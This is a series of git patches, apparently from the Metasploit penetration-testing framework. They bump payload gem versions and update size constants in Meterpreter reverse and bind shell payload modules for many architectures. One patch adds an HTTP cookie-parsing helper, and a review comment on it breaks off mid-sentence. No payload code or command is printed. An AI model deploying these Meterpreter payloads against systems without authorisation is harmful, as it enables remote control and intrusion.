@@ -72,7 +72,7 @@ Gem::Specification.new do |spec| # Needed for Meterpreter spec.add_runtime_dependency 'metasploit-payloads', '1.3.20' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.2' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.3' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb index c8ac809abd..9e37532887 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb index 01758f1e19..34bfe5b005 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb @@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb index a3d0a0181e..9ce15911e4 100644 --- a/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb 
@@ -10,6 +10,8 @@ require 'msf/base/sessions/meterpreter_aarch64_apple_ios' module MetasploitModule + CachedSize = 692552 + include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions include Msf::Sessions::MettleConfig diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb index 748c528ded..86517c6bb0 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb index a153f85288..b19925fee3 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb index 97a9cad2de..62fd49d59a 100644 --- a/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_aarch64_linux' module MetasploitModule - CachedSize = 966280 + CachedSize = 966336 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb index 48969bf801..ae4456c4b0 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb index e16a901ba3..76fd1de63e 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb index 5380aa8776..fdd00a7280 100644 --- a/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armbe_linux' module MetasploitModule - CachedSize = 902524 + CachedSize = 902448 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb index 09be944245..2ffb543246 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb index bb4712dd3a..da35fc733c 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb index b22a8b742c..15d41127d5 100644 --- a/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_armle_linux' module MetasploitModule - CachedSize = 898776 + CachedSize = 898700 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb index 75846e6148..2f8e28cd3b 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb index e299cb17e8..2b8d368799 100644 
--- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb index 93671fb0c4..ceb5e85981 100644 --- a/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mips64_linux' module MetasploitModule - CachedSize = 1384552 + CachedSize = 1384304 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index beb16c74c9..119bf179a8 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index 1c6adb7bbf..54f2e1a0ac 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions 
diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index 942611a9d4..f9073d031f 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1280872 + CachedSize = 1280788 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb index 6d2bd7d6bb..0459025bca 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb index 78b921b6fb..5df675af37 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb index 792a55b199..0c74e259e5 100644 --- a/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsle_linux' module MetasploitModule - CachedSize = 1281916 + CachedSize = 1281832 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb index 68cd6961ed..c6d8de8f4f 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb index eafc0870bb..2f19875c00 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb index 33dcace433..bff6d54ef5 100644 --- a/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc_linux' module MetasploitModule - CachedSize = 1060624 + CachedSize = 1060552 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb index bc303520da..f567568271 100644 
--- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb index 1be0eb35b0..5b9d558d68 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb index f89b1f078f..00e989b436 100644 --- a/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppc64le_linux' module MetasploitModule - CachedSize = 1014112 + CachedSize = 1014024 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb index d0c7fdaa29..0cd1eeae76 100644 --- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux'
 module MetasploitModule
- CachedSize = 1013304
+ CachedSize = 1013232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
index f29d3b36fe..be4edfe5bc 100644
--- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux'
 module MetasploitModule
- CachedSize = 1013304
+ CachedSize = 1013232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
index d85a3d01c2..6242fb1cd2 100644
--- a/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_ppce500v2_linux'
 module MetasploitModule
- CachedSize = 1013304
+ CachedSize = 1013232
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
index 8b5b9f83fd..d9d566b083 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 905984
+ CachedSize = 905896
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
index 8dfc4aa031..46527bdcf5 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 905984
+ CachedSize = 905896
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
index fc66f7ed71..3bb1faae90 100644
--- a/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_linux'
 module MetasploitModule
- CachedSize = 905984
+ CachedSize = 905896
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
index 88d00a81c0..e6a49d928f 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 956868
+ CachedSize = 956796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
index 402929bbbf..97a109ec52 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 956868
+ CachedSize = 956796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
index ed7b1419aa..6b520cb0f9 100644
--- a/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/x86/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x86_linux'
 module MetasploitModule
- CachedSize = 956868
+ CachedSize = 956796
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
index fbb5e7daff..b039b00993 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 1071464
+ CachedSize = 1071376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
index c2455679f7..113ec05316 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 1071464
+ CachedSize = 1071376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
index b711cb5502..58f567a34d 100644
--- a/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_zarch_linux'
 module MetasploitModule
- CachedSize = 1071464
+ CachedSize = 1071376
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
index 82b9690de1..a31bd2152d 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_http.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 802564
+ CachedSize = 802436
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
index e9a59c6758..e4d3654632 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_https.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 802564
+ CachedSize = 802436
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
diff --git a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
index c592aca520..f4fcf15cc6 100644
--- a/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/osx/x64/meterpreter_reverse_tcp.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_x64_osx'
 module MetasploitModule
- CachedSize = 802564
+ CachedSize = 802436
 include Msf::Payload::Single
 include Msf::Sessions::MeterpreterOptions
From 24907938bbf21be130dcab47744ee71291e18d41 Mon Sep 17 00:00:00 2001
From: Brent Cook Date: Wed, 20 Dec 2017 16:47:37 -0600 Subject: [PATCH 36/37] bump payloads, various fixes --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- 6 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 5e29273834..2be32345d4 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -17,7 +17,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
- metasploit-payloads (= 1.3.20)
+ metasploit-payloads (= 1.3.23)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.3.3)
 msgpack
@@ -177,7 +177,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.3.20)
+ metasploit-payloads (1.3.23)
 metasploit_data_models (2.0.15)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 028945b2b9..afcd2a516d 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.3.20'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.3.23'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.3.3'
 # Needed by msfgui and other rpc components
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index 4d4122c50f..f6a3957f28 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 58390
+ CachedSize = 58486
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index 718834de94..86ee953197 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 58354
+ CachedSize = 58450
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index 1332079c54..8460fa21d7 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 58354
+ CachedSize = 58450
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index ed4250ec79..12a3366a94 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 58306
+ CachedSize = 58402
 include Msf::Payload::Single
 include Msf::Payload::Python
From 2e62d77e3680f1146e6cc647e01464bc42d54a97 Mon Sep 17 00:00:00 2001
From: Jon Hart Date: Wed, 20 Dec 2017 16:19:44 -0800 Subject: [PATCH 37/37] Add new method for fetching parsed cookies from an HTTP response This fixed #9332. --- lib/rex/proto/http/response.rb | 13 ++++++++++++ spec/lib/rex/proto/http/response_spec.rb | 26 +++++++++++++++++++++++- 2 files changed, 38 insertions(+), 1 deletion(-)
diff --git a/lib/rex/proto/http/response.rb b/lib/rex/proto/http/response.rb
index 0e0594ebc2..6a53c23126 100644
--- a/lib/rex/proto/http/response.rb
+++ b/lib/rex/proto/http/response.rb
@@ -1,4 +1,5 @@
 # -*- coding: binary -*-
+require 'cgi'
 require 'uri'
 require 'rex/proto/http'
 require 'nokogiri'
@@ -84,6 +85,18 @@ class Response < Packet
 return cookies.strip
 end
+ #
+ # Gets cookies from the Set-Cookie header in a parsed format
+ #
+ def get_cookies_parsed
+ if (self.headers.include?('Set-Cookie'))
+ ret = CGI::Cookie::parse(self.headers['Set-Cookie'])
+ else
+ ret = {}
+ end
+ ret
+ end
+
 # Returns a parsed HTML document.
 # Instead of using regexes to parse the HTML body, you should use this and use the Nokogiri API.
diff --git a/spec/lib/rex/proto/http/response_spec.rb b/spec/lib/rex/proto/http/response_spec.rb
index 4c8d178620..2fc0869dbf 100644
--- a/spec/lib/rex/proto/http/response_spec.rb
+++ b/spec/lib/rex/proto/http/response_spec.rb
@@ -133,6 +133,14 @@ RSpec.describe Rex::Proto::Http::Response do
 HEREDOC
 end
+ let (:get_cookies_spaces_and_missing_semicolon) do
+ <<-HEREDOC.gsub(/^ {6}/, '')
+ HTTP/1.1 200 OK
+ Set-Cookie: k1=v1; k2=v2;k3=v3
+
+ HEREDOC
+ end
+
 let (:meta_name) do
 'META_NAME'
 end
@@ -176,7 +184,7 @@ RSpec.describe Rex::Proto::Http::Response do
 Computer 44.95 2000-10-01
- An in-depth look at creating applications
+ An in-depth look at creating applications
 with XML.
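Review bot: `get_cookies_parsed` hands the response's `Set-Cookie` value to `CGI::Cookie.parse`, which is written for a request `Cookie:` header, so every `;`-separated pair becomes an entry: attributes such as `Path=/`, `Domain=` or `Expires=` come back as if they were cookies, bare flags like `Secure` and `HttpOnly` are dropped, a value containing `&` is split into several values, and names and values are URL-decoded; the method comment should say so, e.g. `# @return [Hash{String => CGI::Cookie}] name => parsed cookie; Set-Cookie attributes (Path, Expires, ...) appear as entries and values are URL-decoded`. The two branches also disagree on the empty case: `CGI::Cookie.parse` returns a `Hash.new([])`, so a missing name yields `[]` from one branch but `nil` from the literal `{}` in the other; since `CGI::Cookie.parse(nil)` already returns that empty default hash, `ret = CGI::Cookie.parse(self.headers['Set-Cookie'])` alone would do if the header store returns 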